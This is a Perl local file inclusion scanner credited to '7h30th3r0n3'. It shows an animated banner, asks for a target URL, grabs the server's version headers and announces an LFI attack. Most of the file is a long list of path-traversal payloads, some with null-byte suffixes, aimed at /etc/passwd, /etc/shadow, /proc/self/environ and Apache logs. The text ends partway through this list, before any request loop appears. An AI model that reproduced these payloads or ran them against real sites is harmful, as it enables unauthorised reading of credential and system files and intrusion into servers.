
#!/usr/bin/perl

#created by: 7h30th3r0n3

use LWP::UserAgent;
use HTTP::Request;

print "\033[2J"; 
print "\033[0;0H";

print "     ===========\n";
print "    |      _     |\n";
print "    |     | |    |\n";
print "    |     | |    |\n";
print "    |     | |___ |\n";
print "    |     |_____||\n";
print "    |            |\n";
print "     ============\n";
print "\n";
print "\n";
print "\n";
print "\n";
print "\n";

select(undef, undef, undef, 0.15);



print "\033[2J"; 
print "\033[0;0H";

print "     ==========================\n";
print "    |      _     _____ ___     |\n";
print "    |     | |   |  ___|_ _|    |\n";
print "    |     | |   | |_   | |____ |\n";
print "    |     | |___|  _|  | |____ |\n";
print "    |     |_____|_|   |___|    |\n";
print "    |                          |\n";
print "     ==========================\n";
print "\n";
print "\n";
print "\n";
print "\n";
print "\n";

select(undef, undef, undef, 0.15);


print "\033[2J"; 
print "\033[0;0H";


print "     ==============================================\n";
print "    |      _     _____ ___     ____   ____    _    |\n";
print "    |     | |   |  ___|_ _|   / ___| / ___|  / \\   |\n";
print "    |     | |   | |_   | |____\\___ \\| |     / _ \\  |\n";
print "    |     | |___|  _|  | |_____|__) | |___ / ___ \\ |\n";
print "    |     |_____|_|   |___|   |____/ \\____/_/   \\_\\|\n";
print "    |                                              |\n";
print "     =============================by 7h30th3r0n3===\n";
print "\n";
print "\n";
print "\n";
print "\n";
print "\n";

select(undef, undef, undef, 0.15);

print "\033[2J"; 
print "\033[0;0H";

print "     =========================================================\n";
print "    |      _     _____ ___     ____   ____    _    _   _      |\n";
print "    |     | |   |  ___|_ _|   / ___| / ___|  / \\  | \\ | | __  |\n";
print "    |     | |   | |_   | |____\\___ \\| |     / _ \\ |  \\| |     |\n";
print "    |     | |___|  _|  | |_____|__) | |___ / ___ \\| |\\  |  \\  |\n";
print "    |     |_____|_|   |___|   |____/ \\____/_/   \\_\\_| \\_|     |\n";
print "    |                                                         |\n";
print "     =============================by 7h30th3r0n3==============\n";
print "\n";
print "\n";
print "\n";
print "\n";
print "\n";

select(undef, undef, undef, 0.15);



print "\033[2J"; 
print "\033[0;0H";

print "     ==========================================================================\n";
print "    |      _     _____ ___     ____   ____    _    _   _         _   ___       |\n";
print "    |     | |   |  ___|_ _|   / ___| / ___|  / \\  | \\ | | __   _/ | / _ \\      |\n";
print "    |     | |   | |_   | |____\\___ \\| |     / _ \\ |  \\| | \\ \\ / / || | | |     |\n";
print "    |     | |___|  _|  | |_____|__) | |___ / ___ \\| |\\  |  \\ V /| || |_| |     |\n";
print "    |     |_____|_|   |___|   |____/ \\____/_/   \\_\\_| \\_|   \\_/ |_(_)___/      |\n";
print "    |                                                                          |\n";
print "     =============================by 7h30th3r0n3===============================\n";
print "\n";
print "\n";
print "\n";
print "\n";
print "\n";

print "Input the website with parameter: www.website.com/index.php?id=\n";
print "\n";


print '> ';chomp($link = <STDIN>);
if($link !~ /http:\/\//) { $link = "http://$link"; }
#httpd type scan
print "\n> press [enter] to check httpd version : \n";
$httpd =<STDIN>;
$host = $link;
$useragent = LWP::UserAgent->new;
$resp = $useragent->head($host);
print $resp->headers_as_string;
print "\n> press [enter] to launch LFI attack :\n";

$start =<STDIN>;
@vuls = ('/etc/passwd',
'../etc/passwd',
'../../etc/passwd',
'../../../etc/passwd',
'../../../../etc/passwd',
'../../../../../etc/passwd',
'../../../../../../etc/passwd',
'../../../../../../../etc/passwd',
'../../../../../../../../etc/passwd',
'../../../../../../../../../etc/passwd',
'../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../etc/passwd',
'../etc/passwd%00',
'../../etc/passwd%00',
'../../../etc/passwd%00',
'../../../../etc/passwd%00',
'../../../../../etc/passwd%00',
'../../../../../../etc/passwd%00',
'../../../../../../../etc/passwd%00',
'../../../../../../../../etc/passwd%00',
'../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../etc/passwd%00',
'/proc/self/environ',
'../proc/self/environ',
'../../proc/self/environ',
'../../../proc/self/environ',
'../../../../proc/self/environ',
'../../../../../proc/self/environ',
'../../../../../../proc/self/environ',
'../../../../../../../proc/self/environ',
'../../../../../../../../proc/self/environ',
'../../../../../../../../../proc/self/environ',
'../../../../../../../../../../proc/self/environ',
'../../../../../../../../../../../proc/self/environ',
'/proc/self/environ%00',
'../proc/self/environ%00',
'../../proc/self/environ%00',
'../../../proc/self/environ%00',
'../../../../proc/self/environ%00',
'../../../../../proc/self/environ%00',
'../../../../../../proc/self/environ%00',
'../../../../../../../proc/self/environ%00',
'../../../../../../../../proc/self/environ%00',
'../../../../../../../../../proc/self/environ%00',
'../../../../../../../../../../proc/self/environ%00',
'../../../../../../../../../../../proc/self/environ%00',
'/etc/group',
'../etc/group',
'../../etc/group',
'../../../etc/group',
'../../../../etc/group',
'../../../../../etc/group',
'../../../../../../etc/group',
'../../../../../../../etc/group',
'../../../../../../../../etc/group',
'../../../../../../../../../etc/group',
'../../../../../../../../../../etc/group',
'../../../../../../../../../../../etc/group',
'/etc/group%00',
'../etc/group%00',
'../../etc/group%00',
'../../../etc/group%00',
'../../../../etc/group%00',
'../../../../../etc/group%00',
'../../../../../../etc/group%00',
'../../../../../../../etc/group%00',
'../../../../../../../../etc/group%00',
'../../../../../../../../../etc/group%00',
'../../../../../../../../../../etc/group%00',
'../../../../../../../../../../../etc/group%00',
'/etc/security/group',
'../etc/security/group',
'../../etc/security/group',
'../../../etc/security/group',
'../../../../etc/security/group',
'../../../../../etc/security/group',
'../../../../../../etc/security/group',
'../../../../../../../etc/security/group',
'../../../../../../../../etc/security/group',
'../../../../../../../../../etc/security/group',
'../../../../../../../../../../etc/security/group',
'../../../../../../../../../../../etc/security/group',
'/etc/security/group%00',
'../etc/security/group%00',
'../../etc/security/group%00',
'../../../etc/security/group%00',
'../../../../etc/security/group%00',
'../../../../../etc/security/group%00',
'../../../../../../etc/security/group%00',
'../../../../../../../etc/security/group%00',
'../../../../../../../../etc/security/group%00',
'../../../../../../../../../etc/security/group%00',
'../../../../../../../../../../etc/security/group%00',
'../../../../../../../../../../../etc/security/group%00',
'/etc/user',
'../etc/user',
'../../etc/user',
'../../../etc/user',
'../../../../etc/user',
'../../../../../etc/user',
'../../../../../../etc/user',
'../../../../../../../etc/user',
'../../../../../../../../etc/user',
'../../../../../../../../../etc/user',
'../../../../../../../../../../etc/user',
'../../../../../../../../../../../etc/user',
'/etc/user%00',
'../etc/user%00',
'../../etc/user%00',
'../../../etc/user%00',
'../../../../etc/user%00',
'../../../../../etc/user%00',
'../../../../../../etc/user%00',
'../../../../../../../etc/user%00',
'../../../../../../../../etc/user%00',
'../../../../../../../../../etc/user%00',
'../../../../../../../../../../etc/user%00',
'../../../../../../../../../../../etc/user%00',
'/etc/shadow',
'../etc/shadow',
'../../etc/shadow',
'../../../etc/shadow',
'../../../../etc/shadow',
'../../../../../etc/shadow',
'../../../../../../etc/shadow',
'../../../../../../../etc/shadow',
'../../../../../../../../etc/shadow',
'../../../../../../../../../etc/shadow',
'../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../etc/shadow',
'/etc/shadow%00',
'../etc/shadow%00',
'../../etc/shadow%00',
'../../../etc/shadow%00',
'../../../../etc/shadow%00',
'../../../../../etc/shadow%00',
'../../../../../../etc/shadow%00',
'../../../../../../../etc/shadow%00',
'../../../../../../../../etc/shadow%00',
'../../../../../../../../../etc/shadow%00',
'../../../../../../../../../../etc/shadow%00',
'../../../../../../../../../../../etc/shadow%00',
'/etc/security/passwd',
'../etc/security/passwd',
'../../etc/security/passwd',
'../../../etc/security/passwd',
'../../../../etc/security/passwd',
'../../../../../etc/security/passwd',
'../../../../../../etc/security/passwd',
'../../../../../../../etc/security/passwd',
'../../../../../../../../etc/security/passwd',
'../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../etc/security/passwd',
'/etc/security/passwd%00',
'../etc/security/passwd%00',
'../../etc/security/passwd%00',
'../../../etc/security/passwd%00',
'../../../../etc/security/passwd%00',
'../../../../../etc/security/passwd%00',
'../../../../../../etc/security/passwd%00',
'../../../../../../../etc/security/passwd%00',
'../../../../../../../../etc/security/passwd%00',
'../../../../../../../../../etc/security/passwd%00',
'../../../../../../../../../../etc/security/passwd%00',
'../../../../../../../../../../../etc/security/passwd%00',
'/etc/security/user',
'../etc/security/user',
'../../etc/security/user',
'../../../etc/security/user',
'../../../../etc/security/user',
'../../../../../etc/security/user',
'../../../../../../etc/security/user',
'../../../../../../../etc/security/user',
'../../../../../../../../etc/security/user',
'../../../../../../../../../etc/security/user',
'../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../etc/security/user',
'/etc/security/user%00',
'../etc/security/user%00',
'../../etc/security/user%00',
'../../../etc/security/user%00',
'../../../../etc/security/user%00',
'../../../../../etc/security/user%00',
'../../../../../../etc/security/user%00',
'../../../../../../../etc/security/user%00',
'../../../../../../../../etc/security/user%00',
'../../../../../../../../../etc/security/user%00',
'../../../../../../../../../../etc/security/user%00',
'../../../../../../../../../../../etc/security/user%00',
'/etc/security/environ',
'../etc/security/environ',
'../../etc/security/environ',
'../../../etc/security/environ',
'../../../../etc/security/environ',
'../../../../../etc/security/environ',
'../../../../../../etc/security/environ',
'../../../../../../../etc/security/environ',
'../../../../../../../../etc/security/environ',
'../../../../../../../../../etc/security/environ',
'../../../../../../../../../../etc/security/environ',
'../../../../../../../../../../../etc/security/environ',
'/etc/security/environ%00',
'../etc/security/environ%00',
'../../etc/security/environ%00',
'../../../etc/security/environ%00',
'../../../../etc/security/environ%00',
'../../../../../etc/security/environ%00',
'../../../../../../etc/security/environ%00',
'../../../../../../../etc/security/environ%00',
'../../../../../../../../etc/security/environ%00',
'../../../../../../../../../etc/security/environ%00',
'../../../../../../../../../../etc/security/environ%00',
'../../../../../../../../../../../etc/security/environ%00',
'/etc/security/limits',
'../etc/security/limits',
'../../etc/security/limits',
'../../../etc/security/limits',
'../../../../etc/security/limits',
'../../../../../etc/security/limits',
'../../../../../../etc/security/limits',
'../../../../../../../etc/security/limits',
'../../../../../../../../etc/security/limits',
'../../../../../../../../../etc/security/limits',
'../../../../../../../../../../etc/security/limits',
'../../../../../../../../../../../etc/security/limits',
'/etc/security/limits%00',
'../etc/security/limits%00',
'../../etc/security/limits%00',
'../../../etc/security/limits%00',
'../../../../etc/security/limits%00',
'../../../../../etc/security/limits%00',
'../../../../../../etc/security/limits%00',
'../../../../../../../etc/security/limits%00',
'../../../../../../../../etc/security/limits%00',
'../../../../../../../../../etc/security/limits%00',
'../../../../../../../../../../etc/security/limits%00',
'../../../../../../../../../../../etc/security/limits%00',
'/usr/lib/security/mkuser.default',
'../usr/lib/security/mkuser.default',
'../../usr/lib/security/mkuser.default',
'../../../usr/lib/security/mkuser.default',
'../../../../usr/lib/security/mkuser.default',
'../../../../../usr/lib/security/mkuser.default',
'../../../../../../usr/lib/security/mkuser.default',
'../../../../../../../usr/lib/security/mkuser.default',
'../../../../../../../../usr/lib/security/mkuser.default',
'../../../../../../../../../usr/lib/security/mkuser.default',
'../../../../../../../../../../usr/lib/security/mkuser.default',
'../../../../../../../../../../../usr/lib/security/mkuser.default',
'/usr/lib/security/mkuser.default%00',
'../usr/lib/security/mkuser.default%00',
'../../usr/lib/security/mkuser.default%00',
'../../../usr/lib/security/mkuser.default%00',
'../../../../usr/lib/security/mkuser.default%00',
'../../../../../usr/lib/security/mkuser.default%00',
'../../../../../../usr/lib/security/mkuser.default%00',
'../../../../../../../usr/lib/security/mkuser.default%00',
'../../../../../../../../usr/lib/security/mkuser.default%00',
'../../../../../../../../../usr/lib/security/mkuser.default%00',
'../../../../../../../../../../usr/lib/security/mkuser.default%00',
'../../../../../../../../../../../usr/lib/security/mkuser.default%00',
'/apache/logs/access.log',
'../apache/logs/access.log',
'../../apache/logs/access.log',
'../../../apache/logs/access.log',
'../../../../apache/logs/access.log',
'../../../../../apache/logs/access.log',
'../../../../../../apache/logs/access.log',
'../../../../../../../apache/logs/access.log',
'../../../../../../../../apache/logs/access.log',
'../../../../../../../../../apache/logs/access.log',
'../../../../../../../../../../apache/logs/access.log',
'../../../../../../../../../../../apache/logs/access.log',
'/apache/logs/access.log%00',
'../apache/logs/access.log%00',
'../../apache/logs/access.log%00',
'../../../apache/logs/access.log%00',
'../../../../apache/logs/access.log%00',
'../../../../../apache/logs/access.log%00',
'../../../../../../apache/logs/access.log%00',
'../../../../../../../apache/logs/access.log%00',
'../../../../../../../../apache/logs/access.log%00',
'../../../../../../../../../apache/logs/access.log%00',
'../../../../../../../../../../apache/logs/access.log%00',
'../../../../../../../../../../../apache/logs/access.log%00',
'/apache/logs/error.log',
'../apache/logs/error.log',
'../../apache/logs/error.log',
'../../../apache/logs/error.log',
'../../../../apache/logs/error.log',
'../../../../../apache/logs/error.log',
'../../../../../../apache/logs/error.log',
'../../../../../../../apache/logs/error.log',
'../../../../../../../../apache/logs/error.log',
'../../../../../../../../../apache/logs/error.log',
'../../../../../../../../../../apache/logs/error.log',
'../../../../../../../../../../../apache/logs/error.log',
'/apache/logs/error.log%00',
'../apache/logs/error.log%00',
'../../apache/logs/error.log%00',
'../../../apache/logs/error.log%00',
'../../../../apache/logs/error.log%00',
'../../../../../apache/logs/error.log%00',
'../../../../../../apache/logs/error.log%00',
'../../../../../../../apache/logs/error.log%00',
'../../../../../../../../apache/logs/error.log%00',
'../../../../../../../../../apache/logs/error.log%00',
'../../../../../../../../../../apache/logs/error.log%00',
'../../../../../../../../../../../apache/logs/error.log%00',
'/etc/httpd/logs/acces_log',
'../etc/httpd/logs/acces_log',
'../../etc/httpd/logs/acces_log',
'../../../etc/httpd/logs/acces_log',
'../../../../etc/httpd/logs/acces_log',
'../../../../../etc/httpd/logs/acces_log',
'../../../../../../etc/httpd/logs/acces_log',
'../../../../../../../etc/httpd/logs/acces_log',
'../../../../../../../../etc/httpd/logs/acces_log',
'../../../../../../../../../etc/httpd/logs/acces_log',
'../../../../../../../../../../etc/httpd/logs/acces_log',
'../../../../../../../../../../../etc/httpd/logs/acces_log',
'/etc/httpd/logs/acces_log%00',
'../etc/httpd/logs/acces_log%00',
'../../etc/httpd/logs/acces_log%00',
'../../../etc/httpd/logs/acces_log%00',
'../../../../etc/httpd/logs/acces_log%00',
'../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../../../../../etc/httpd/logs/acces_log%00',
'../../../../../../../../../../../etc/httpd/logs/acces_log%00',
'/etc/httpd/logs/error_log',
'../etc/httpd/logs/error_log',
'../../etc/httpd/logs/error_log',
'../../../etc/httpd/logs/error_log',
'../../../../etc/httpd/logs/error_log',
'../../../../../etc/httpd/logs/error_log',
'../../../../../../etc/httpd/logs/error_log',
'../../../../../../../etc/httpd/logs/error_log',
'../../../../../../../../etc/httpd/logs/error_log',
'../../../../../../../../../etc/httpd/logs/error_log',
'../../../../../../../../../../etc/httpd/logs/error_log',
'../../../../../../../../../../../etc/httpd/logs/error_log',
'/etc/httpd/logs/error_log%00',
'../etc/httpd/logs/error_log%00',
'../../etc/httpd/logs/error_log%00',
'../../../etc/httpd/logs/error_log%00',
'../../../../etc/httpd/logs/error_log%00',
'../../../../../etc/httpd/logs/error_log%00',
'../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../../../etc/httpd/logs/error_log%00',
'../../../../../../../../../../../etc/httpd/logs/error_log%00',
'/var/www/logs/access_log',
'../var/www/logs/access_log',
'../../var/www/logs/access_log',
'../../../var/www/logs/access_log',
'../../../../var/www/logs/access_log',
'../../../../../var/www/logs/access_log',
'../../../../../../var/www/logs/access_log',
'../../../../../../../var/www/logs/access_log',
'../../../../../../../../var/www/logs/access_log',
'../../../../../../../../../var/www/logs/access_log',
'../../../../../../../../../../var/www/logs/access_log',
'../../../../../../../../../../../var/www/logs/access_log',
'/var/www/logs/access_log%00',
'../var/www/logs/access_log%00',
'../../var/www/logs/access_log%00',
'../../../var/www/logs/access_log%00',
'../../../../var/www/logs/access_log%00',
'../../../../../var/www/logs/access_log%00',
'../../../../../../var/www/logs/access_log%00',
'../../../../../../../var/www/logs/access_log%00',
'../../../../../../../../var/www/logs/access_log%00',
'../../../../../../../../../var/www/logs/access_log%00',
'../../../../../../../../../../var/www/logs/access_log%00',
'../../../../../../../../../../../var/www/logs/access_log%00',
'/var/www/logs/error_log',
'../var/www/logs/error_log',
'../../var/www/logs/error_log',
'../../../var/www/logs/error_log',
'../../../../var/www/logs/error_log',
'../../../../../var/www/logs/error_log',
'../../../../../../var/www/logs/error_log',
'../../../../../../../var/www/logs/error_log',
'../../../../../../../../var/www/logs/error_log',
'../../../../../../../../../var/www/logs/error_log',
'../../../../../../../../../../var/www/logs/error_log',
'../../../../../../../../../../../var/www/logs/error_log',
'/var/www/logs/error_log%00',
'../var/www/logs/error_log%00',
'../../var/www/logs/error_log%00',
'../../../var/www/logs/error_log%00',
'../../../../var/www/logs/error_log%00',
'../../../../../var/www/logs/error_log%00',
'../../../../../../var/www/logs/error_log%00',
'../../../../../../../var/www/logs/error_log%00',
'../../../../../../../../var/www/logs/error_log%00',
'../../../../../../../../../var/www/logs/error_log%00',
'../../../../../../../../../../var/www/logs/error_log%00',
'../../../../../../../../../../../var/www/logs/error_log%00',
'/usr/local/apache/logs/access_ log',
'../usr/local/apache/logs/access_ log',
'../../usr/local/apache/logs/access_ log',
'../../../usr/local/apache/logs/access_ log',
'../../../../usr/local/apache/logs/access_ log',
'../../../../../usr/local/apache/logs/access_ log',
'../../../../../../usr/local/apache/logs/access_ log',
'../../../../../../../usr/local/apache/logs/access_ log',
'../../../../../../../../usr/local/apache/logs/access_ log',
'../../../../../../../../../usr/local/apache/logs/access_ log',
'../../../../../../../../../../usr/local/apache/logs/access_ log',
'../../../../../../../../../../../usr/local/apache/logs/access_ log',
'/usr/local/apache/logs/access_ log%00',
'../usr/local/apache/logs/access_ log%00',
'../../usr/local/apache/logs/access_ log%00',
'../../../usr/local/apache/logs/access_ log%00',
'../../../../usr/local/apache/logs/access_ log%00',
'../../../../../usr/local/apache/logs/access_ log%00',
'../../../../../../usr/local/apache/logs/access_ log%00',
'../../../../../../../usr/local/apache/logs/access_ log%00',
'../../../../../../../../usr/local/apache/logs/access_ log%00',
'../../../../../../../../../usr/local/apache/logs/access_ log%00',
'../../../../../../../../../../usr/local/apache/logs/access_ log%00',
'../../../../../../../../../../../usr/local/apache/logs/access_ log%00',
'/usr/local/apache/logs/error_ log',
'../usr/local/apache/logs/error_ log',
'../../usr/local/apache/logs/error_ log',
'../../../usr/local/apache/logs/error_ log',
'../../../../usr/local/apache/logs/error_ log',
'../../../../../usr/local/apache/logs/error_ log',
'../../../../../../usr/local/apache/logs/error_ log',
'../../../../../../../usr/local/apache/logs/error_ log',
'../../../../../../../../usr/local/apache/logs/error_ log',
'../../../../../../../../../usr/local/apache/logs/error_ log',
'../../../../../../../../../../usr/local/apache/logs/error_ log',
'../../../../../../../../../../../usr/local/apache/logs/error_ log',
'/usr/local/apache/logs/error_ log%00',
'../usr/local/apache/logs/error_ log%00',
'../../usr/local/apache/logs/error_ log%00',
'../../../usr/local/apache/logs/error_ log%00',
'../../../../usr/local/apache/logs/error_ log%00',
'../../../../../usr/local/apache/logs/error_ log%00',
'../../../../../../usr/local/apache/logs/error_ log%00',
'../../../../../../../usr/local/apache/logs/error_ log%00',
'../../../../../../../../usr/local/apache/logs/error_ log%00',
'../../../../../../../../../usr/local/apache/logs/error_ log%00',
'../../../../../../../../../../usr/local/apache/logs/error_ log%00',
'../../../../../../../../../../../usr/local/apache/logs/error_ log%00',
'/var/log/apache/access_log',
'../var/log/apache/access_log',
'../../var/log/apache/access_log',
'../../../var/log/apache/access_log',
'../../../../var/log/apache/access_log',
'../../../../../var/log/apache/access_log',
'../../../../../../var/log/apache/access_log',
'../../../../../../../var/log/apache/access_log',
'../../../../../../../../var/log/apache/access_log',
'../../../../../../../../../var/log/apache/access_log',
'../../../../../../../../../../var/log/apache/access_log',
'../../../../../../../../../../../var/log/apache/access_log',
'/var/log/apache/access_log%00',
'../var/log/apache/access_log%00',
'../../var/log/apache/access_log%00',
'../../../var/log/apache/access_log%00',
'../../../../var/log/apache/access_log%00',
'../../../../../var/log/apache/access_log%00',
'../../../../../../var/log/apache/access_log%00',
'../../../../../../../var/log/apache/access_log%00',
'../../../../../../../../var/log/apache/access_log%00',
'../../../../../../../../../var/log/apache/access_log%00',
'../../../../../../../../../../var/log/apache/access_log%00',
'../../../../../../../../../../../var/log/apache/access_log%00',
'/var/log/apache/error_log',
'../var/log/apache/error_log',
'../../var/log/apache/error_log',
'../../../var/log/apache/error_log',
'../../../../var/log/apache/error_log',
'../../../../../var/log/apache/error_log',
'../../../../../../var/log/apache/error_log',
'../../../../../../../var/log/apache/error_log',
'../../../../../../../../var/log/apache/error_log',
'../../../../../../../../../var/log/apache/error_log',
'../../../../../../../../../../var/log/apache/error_log',
'../../../../../../../../../../../var/log/apache/error_log',
'/var/log/apache/error_log%00',
'../var/log/apache/error_log%00',
'../../var/log/apache/error_log%00',
'../../../var/log/apache/error_log%00',
'../../../../var/log/apache/error_log%00',
'../../../../../var/log/apache/error_log%00',
'../../../../../../var/log/apache/error_log%00',
'../../../../../../../var/log/apache/error_log%00',
'../../../../../../../../var/log/apache/error_log%00',
'../../../../../../../../../var/log/apache/error_log%00',
'../../../../../../../../../../var/log/apache/error_log%00',
'../../../../../../../../../../../var/log/apache/error_log%00',
'/var/log/apache2/error_log',
'../var/log/apache2/error_log',
'../../var/log/apache2/error_log',
'../../../var/log/apache2/error_log',
'../../../../var/log/apache2/error_log',
'../../../../../var/log/apache2/error_log',
'../../../../../../var/log/apache2/error_log',
'../../../../../../../var/log/apache2/error_log',
'../../../../../../../../var/log/apache2/error_log',
'../../../../../../../../../var/log/apache2/error_log',
'../../../../../../../../../../var/log/apache2/error_log',
'../../../../../../../../../../../var/log/apache2/error_log',
'/var/log/apache2/error_log%00',
'../var/log/apache2/error_log%00',
'../../var/log/apache2/error_log%00',
'../../../var/log/apache2/error_log%00',
'../../../../var/log/apache2/error_log%00',
'../../../../../var/log/apache2/error_log%00',
'../../../../../../var/log/apache2/error_log%00',
'../../../../../../../var/log/apache2/error_log%00',
'../../../../../../../../var/log/apache2/error_log%00',
'../../../../../../../../../var/log/apache2/error_log%00',
'../../../../../../../../../../var/log/apache2/error_log%00',
'../../../../../../../../../../../var/log/apache2/error_log%00',
'/var/log/apache2/access_log',
'../var/log/apache2/access_log',
'../../var/log/apache2/access_log',
'../../../var/log/apache2/access_log',
'../../../../var/log/apache2/access_log',
'../../../../../var/log/apache2/access_log',
'../../../../../../var/log/apache2/access_log',
'../../../../../../../var/log/apache2/access_log',
'../../../../../../../../var/log/apache2/access_log',
'../../../../../../../../../var/log/apache2/access_log',
'../../../../../../../../../../var/log/apache2/access_log',
'../../../../../../../../../../../var/log/apache2/access_log',
'/var/log/apache2/access_log%00',
'../var/log/apache2/access_log%00',
'../../var/log/apache2/access_log%00',
'../../../var/log/apache2/access_log%00',
'../../../../var/log/apache2/access_log%00',
'../../../../../var/log/apache2/access_log%00',
'../../../../../../var/log/apache2/access_log%00',
'../../../../../../../var/log/apache2/access_log%00',
'../../../../../../../../var/log/apache2/access_log%00',
'../../../../../../../../../var/log/apache2/access_log%00',
'../../../../../../../../../../var/log/apache2/access_log%00',
'../../../../../../../../../../../var/log/apache2/access_log%00',
'/var/log/access_log',
'../var/log/access_log',
'../../var/log/access_log',
'../../../var/log/access_log',
'../../../../var/log/access_log',
'../../../../../var/log/access_log',
'../../../../../../var/log/access_log',
'../../../../../../../var/log/access_log',
'../../../../../../../../var/log/access_log',
'../../../../../../../../../var/log/access_log',
'../../../../../../../../../../var/log/access_log',
'../../../../../../../../../../../var/log/access_log',
'/var/log/access_log%00',
'../var/log/access_log%00',
'../../var/log/access_log%00',
'../../../var/log/access_log%00',
'../../../../var/log/access_log%00',
'../../../../../var/log/access_log%00',
'../../../../../../var/log/access_log%00',
'../../../../../../../var/log/access_log%00',
'../../../../../../../../var/log/access_log%00',
'../../../../../../../../../var/log/access_log%00',
'../../../../../../../../../../var/log/access_log%00',
'../../../../../../../../../../../var/log/access_log%00',
'/var/log/error_log',
'../var/log/error_log',
'../../var/log/error_log',
'../../../var/log/error_log',
'../../../../var/log/error_log',
'../../../../../var/log/error_log',
'../../../../../../var/log/error_log',
'../../../../../../../var/log/error_log',
'../../../../../../../../var/log/error_log',
'../../../../../../../../../var/log/error_log',
'../../../../../../../../../../var/log/error_log',
'../../../../../../../../../../../var/log/error_log',
'/var/log/error_log%00',
'../var/log/error_log%00',
'../../var/log/error_log%00',
'../../../var/log/error_log%00',
'../../../../var/log/error_log%00',
'../../../../../var/log/error_log%00',
'../../../../../../var/log/error_log%00',
'../../../../../../../var/log/error_log%00',
'../../../../../../../../var/log/error_log%00',
'../../../../../../../../../var/log/error_log%00',
'../../../../../../../../../../var/log/error_log%00',
'../../../../../../../../../../../var/log/error_log%00',
'/var/www/logs/error_log',
'../var/www/logs/error_log',
'../../var/www/logs/error_log',
'../../../var/www/logs/error_log',
'../../../../var/www/logs/error_log',
'../../../../../var/www/logs/error_log',
'../../../../../../var/www/logs/error_log',
'../../../../../../../var/www/logs/error_log',
'../../../../../../../../var/www/logs/error_log',
'../../../../../../../../../var/www/logs/error_log',
'../../../../../../../../../../var/www/logs/error_log',
'../../../../../../../../../../../var/www/logs/error_log',
'/var/www/logs/error_log%00',
'../var/www/logs/error_log%00',
'../../var/www/logs/error_log%00',
'../../../var/www/logs/error_log%00',
'../../../../var/www/logs/error_log%00',
'../../../../../var/www/logs/error_log%00',
'../../../../../../var/www/logs/error_log%00',
'../../../../../../../var/www/logs/error_log%00',
'../../../../../../../../var/www/logs/error_log%00',
'../../../../../../../../../var/www/logs/error_log%00',
'../../../../../../../../../../var/www/logs/error_log%00',
'../../../../../../../../../../../var/www/logs/error_log%00',
'/var/www/logs/access_log',
'../var/www/logs/access_log',
'../../var/www/logs/access_log',
'../../../var/www/logs/access_log',
'../../../../var/www/logs/access_log',
'../../../../../var/www/logs/access_log',
'../../../../../../var/www/logs/access_log',
'../../../../../../../var/www/logs/access_log',
'../../../../../../../../var/www/logs/access_log',
'../../../../../../../../../var/www/logs/access_log',
'../../../../../../../../../../var/www/logs/access_log',
'../../../../../../../../../../../var/www/logs/access_log',
'/var/www/logs/access_log%00',
'../var/www/logs/access_log%00',
'../../var/www/logs/access_log%00',
'../../../var/www/logs/access_log%00',
'../../../../var/www/logs/access_log%00',
'../../../../../var/www/logs/access_log%00',
'../../../../../../var/www/logs/access_log%00',
'../../../../../../../var/www/logs/access_log%00',
'../../../../../../../../var/www/logs/access_log%00',
'../../../../../../../../../var/www/logs/access_log%00',
'../../../../../../../../../../var/www/logs/access_log%00',
'../../../../../../../../../../../var/www/logs/access_log%00',
'/usr/local/apache/logs/error_log',
'../usr/local/apache/logs/error_log',
'../../usr/local/apache/logs/error_log',
'../../../usr/local/apache/logs/error_log',
'../../../../usr/local/apache/logs/error_log',
'../../../../../usr/local/apache/logs/error_log',
'../../../../../../usr/local/apache/logs/error_log',
'../../../../../../../usr/local/apache/logs/error_log',
'../../../../../../../../usr/local/apache/logs/error_log',
'../../../../../../../../../usr/local/apache/logs/error_log',
'../../../../../../../../../../usr/local/apache/logs/error_log',
'../../../../../../../../../../../usr/local/apache/logs/error_log',
'/usr/local/apache/logs/error_log%00',
'../usr/local/apache/logs/error_log%00',
'../../usr/local/apache/logs/error_log%00',
'../../../usr/local/apache/logs/error_log%00',
'../../../../usr/local/apache/logs/error_log%00',
'../../../../../usr/local/apache/logs/error_log%00',
'../../../../../../usr/local/apache/logs/error_log%00',
'../../../../../../../usr/local/apache/logs/error_log%00',
'../../../../../../../../usr/local/apache/logs/error_log%00',
'../../../../../../../../../usr/local/apache/logs/error_log%00',
'../../../../../../../../../../usr/local/apache/logs/error_log%00',
'../../../../../../../../../../../usr/local/apache/logs/error_log%00',
'/var/log/httpd/access_log',
'../var/log/httpd/access_log',
'../../var/log/httpd/access_log',
'../../../var/log/httpd/access_log',
'../../../../var/log/httpd/access_log',
'../../../../../var/log/httpd/access_log',
'../../../../../../var/log/httpd/access_log',
'../../../../../../../var/log/httpd/access_log',
'../../../../../../../../var/log/httpd/access_log',
'../../../../../../../../../var/log/httpd/access_log',
'../../../../../../../../../../var/log/httpd/access_log',
'../../../../../../../../../../../var/log/httpd/access_log',
'/var/log/httpd/access_log%00',
'../var/log/httpd/access_log%00',
'../../var/log/httpd/access_log%00',
'../../../var/log/httpd/access_log%00',
'../../../../var/log/httpd/access_log%00',
'../../../../../var/log/httpd/access_log%00',
'../../../../../../var/log/httpd/access_log%00',
'../../../../../../../var/log/httpd/access_log%00',
'../../../../../../../../var/log/httpd/access_log%00',
'../../../../../../../../../var/log/httpd/access_log%00',
'../../../../../../../../../../var/log/httpd/access_log%00',
'../../../../../../../../../../../var/log/httpd/access_log%00',
'/var/log/httpd/error_log',
'../var/log/httpd/error_log',
'../../var/log/httpd/error_log',
'../../../var/log/httpd/error_log',
'../../../../var/log/httpd/error_log',
'../../../../../var/log/httpd/error_log',
'../../../../../../var/log/httpd/error_log',
'../../../../../../../var/log/httpd/error_log',
'../../../../../../../../var/log/httpd/error_log',
'../../../../../../../../../var/log/httpd/error_log',
'../../../../../../../../../../var/log/httpd/error_log',
'../../../../../../../../../../../var/log/httpd/error_log',
